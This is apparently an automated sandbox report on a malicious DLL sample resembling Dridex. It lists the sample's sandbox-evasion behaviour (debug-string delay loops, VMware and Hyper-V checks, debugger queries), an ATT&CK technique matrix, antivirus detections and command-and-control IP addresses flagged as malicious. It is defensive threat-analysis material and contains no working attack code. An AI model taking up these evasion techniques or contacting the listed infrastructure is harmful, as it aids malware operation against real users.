Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to delay execution (extensive OutputDebugStringW loop)

Show sources

Source: C:\Windows\System32\loaddll32.exe

Section loaded: OutputDebugStringW count: 1553

Source: C:\Windows\System32\loaddll32.exe

Window / User API: threadDelayed 1553

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E7D0730 GetTokenInformation,GetSystemInfo,GetTokenInformation,

0_2_6E7D0730

Source: Amcache.hve.7.dr	Binary or memory string: VMware
Source: Amcache.hve.7.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.7.dr	Binary or memory string: VMware-42 35 9c fb 73 fa 4e 1b-fb a4 60 e7 7b e5 4a ed
Source: Amcache.hve.7.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: WerFault.exe, 00000007.00000003.707741008.00000000051B8000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000002.709674811.00000000051B8000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW4
Source: Amcache.hve.7.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.7.dr	Binary or memory string: VMware7,1
Source: Amcache.hve.7.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.7.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: WerFault.exe, 00000007.00000003.707741008.00000000051B8000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000002.709612720.0000000005180000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000002.709674811.00000000051B8000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.7.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.7.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.7.dr	Binary or memory string: VMware, Inc.me
Source: Amcache.hve.7.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000

Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E7C6D0C GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

0_2_6E7C6D0C

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E7D3138 RtlAddVectoredExceptionHandler,

0_2_6E7D3138

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.4295.dll",#1

Jump to behavior

Source: loaddll32.exe, 00000000.00000002.1192139511.00000000011F0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.673016435.0000000002F10000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.674873635.0000000002F10000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: loaddll32.exe, 00000000.00000002.1192139511.00000000011F0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.673016435.0000000002F10000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.674873635.0000000002F10000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.1192139511.00000000011F0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.673016435.0000000002F10000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.674873635.0000000002F10000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.1192139511.00000000011F0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.673016435.0000000002F10000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.674873635.0000000002F10000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\loaddll32.exe

Code function: GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

0_2_6E7C6D0C

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

0_2_6E7C6D0C

Source: Amcache.hve.7.dr

Binary or memory string: c:\program files\windows defender\msmpeng.exe

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection12	Virtualization/Sandbox Evasion11	OS Credential Dumping	Query Registry1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection12	LSASS Memory	Security Software Discovery31	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information1	Security Account Manager	Virtualization/Sandbox Evasion11	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Rundll321	NTDS	Process Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Application Window Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	Account Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	System Owner/User Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	Remote System Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	System Information Discovery13	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	23%	Virustotal		Browse

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
3.2.rundll32.exe.6e7c0000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
3.0.rundll32.exe.6e7c0000.5.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
0.2.loaddll32.exe.a50000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.0.rundll32.exe.ca0000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.0.rundll32.exe.ca0000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.2.rundll32.exe.ca0000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.0.rundll32.exe.6e7c0000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
0.2.loaddll32.exe.6e7c0000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://www.n4pkg6fy8o.gaDVarFileInfo$	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://upx.sf.net	Amcache.hve.7.dr	false		high
http://www.n4pkg6fy8o.gaDVarFileInfo$	loaddll32.exe, 00000000.00000002.1192332571.000000006E7DF000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.711170171.000000006E7DF000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	low

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
185.4.135.27	unknown	Greece	199246	TOPHOSTGR	true
85.10.248.28	unknown	Germany	24940	HETZNER-ASDE	true
80.211.3.13	unknown	Italy	31034	ARUBA-ASNIT	true
144.91.122.102	unknown	Germany	51167	CONTABODE	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	544174
Start date:	22.12.2021
Start time:	19:53:29
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 30s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	SecuriteInfo.com.W32.AIDetect.malware1.4295.1397 (renamed file extension from 1397 to dll)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal76.troj.evad.winDLL@6/6@0/4
EGA Information:	Failed
HDC Information:	Successful, ratio: 53.8% (good quality ratio 51.4%) Quality average: 78.7% Quality standard deviation: 27.8%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Override analysis time to 240s for rundll32
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 23.54.113.53, 52.168.117.173 Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, onedsblobprdeus16.eastus.cloudapp.azure.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, arc.msn.com Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

Time	Type	Description
19:54:45	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
185.4.135.27	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26959.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.31779.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.20482.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.24851.dll	Get hash	malicious	Browse
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.18811.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.22486.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26959.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.4497.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware2.6935.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware2.6729.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.22789.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.20482.dll	Get hash	malicious	Browse
85.10.248.28	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26959.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.31779.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.20482.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.24851.dll	Get hash	malicious	Browse
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.18811.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.22486.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26959.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.4497.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware2.6935.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware2.6729.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.22789.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.20482.dll	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
TOPHOSTGR	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.26959.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.31779.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.20482.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.24851.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.18811.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.22486.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.26959.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.4497.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware2.6935.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware2.6729.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.22789.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.20482.dll	Get hash	malicious	Browse	185.4.135.27
HETZNER-ASDE	ykTwsaBnqa.exe	Get hash	malicious	Browse	144.76.84.177
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.26959.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.31779.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.20482.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.24851.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.18811.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.22486.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.26959.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.4497.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware2.6935.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware2.6729.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.22789.dll	Get hash	malicious	Browse	85.10.248.28

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_acf0c1b1d931196b9999224049caaf48ed8bd9_82810a17_18fc9f30\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9215171178420921
Encrypted:	false
SSDEEP:	192:3mziH0oXLA/HBUZMX4jed+ym/u7s1S274ItWc:Wzi5XLA/BUZMX4je3m/u7s1X4ItWc
MD5:	A6ECBC4F7890E3786E19E22C8BBF9991
SHA1:	4BBDABA130C47196EE72ACCA7F84EAFCE1AC5112
SHA-256:	F85F6F70E229492A2D792F38BA62F9D8D84AE2051C3C8A857D73D4CD230EE7B3
SHA-512:	885FBC3E95AB1CC0A80C0259D2499E36540BB097246BF9370E61D2A1A122FE46FD11CDBB1B47CB357399D482237CC4A99039801D5FE28E9D1CD6780486C1F435
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.4.6.7.2.8.7.3.9.1.8.2.0.2.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.4.6.7.2.8.8.4.1.6.8.1.6.0.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.e.9.e.4.c.e.c.-.c.f.a.0.-.4.d.7.3.-.8.1.5.7.-.5.0.6.0.0.b.e.7.2.e.3.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.4.9.b.b.1.2.b.-.8.5.d.f.-.4.7.3.6.-.a.7.a.0.-.6.7.6.d.b.3.5.2.d.1.a.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.3.4.-.0.0.0.1.-.0.0.1.b.-.9.4.5.9.-.3.b.5.8.6.5.f.7.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER37D.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8326
Entropy (8bit):	3.6937388638486555
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNi4iA67OguHW6Yai6NgmfT/ZS1+prQ89bFGsfZDXm:RrlsNiS616Yf6NgmfT/ZS8FlfZq
MD5:	64BDB0D7DFD46A8FC429964A9FB5652B
SHA1:	A4FB18BF36B996CEDDBAA9802EE75825213DB7FB
SHA-256:	2509B1313A312455914364ABB46EC0FE3D387E5E96A5CC4F216D3A59CE27281B
SHA-512:	BA9562550A1727918C8E8568FC958C119DA31E1AEE62F172721451923F70919B0353DAC5DB682CE5A124D811532BEB6F62E21A474B2DE27C0D805DEE0DC9D7D4
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.5.2.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6AB.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4696
Entropy (8bit):	4.493100484835204
Encrypted:	false
SSDEEP:	48:cvIwSD8zsSJgtWI9qEWSC8Br8fm8M4JCdsDvhFr+q8/QLBPm04SrSAd:uITfghdSN2JlHVA0DWAd
MD5:	6AC6CD63DB5C7C54F61398EBEFEF516B
SHA1:	14C2EBB588CADA2A0DE61CE08366F32199EA42B9
SHA-256:	125F07114687D87BEF7B7D0B57BAC290431125B5196A1E6E2E3AEE55B28CF5A2
SHA-512:	74E94B763A827FAECEB964D754AB0C0F7E267398E00311AB785DBEBE5AA613BD37A823F6D6EA715F2B9F48D0BF0DA7300B4FBA45A4FAA7AA110DD3FAEA0C616D
Malicious:	false
Reputation:	low
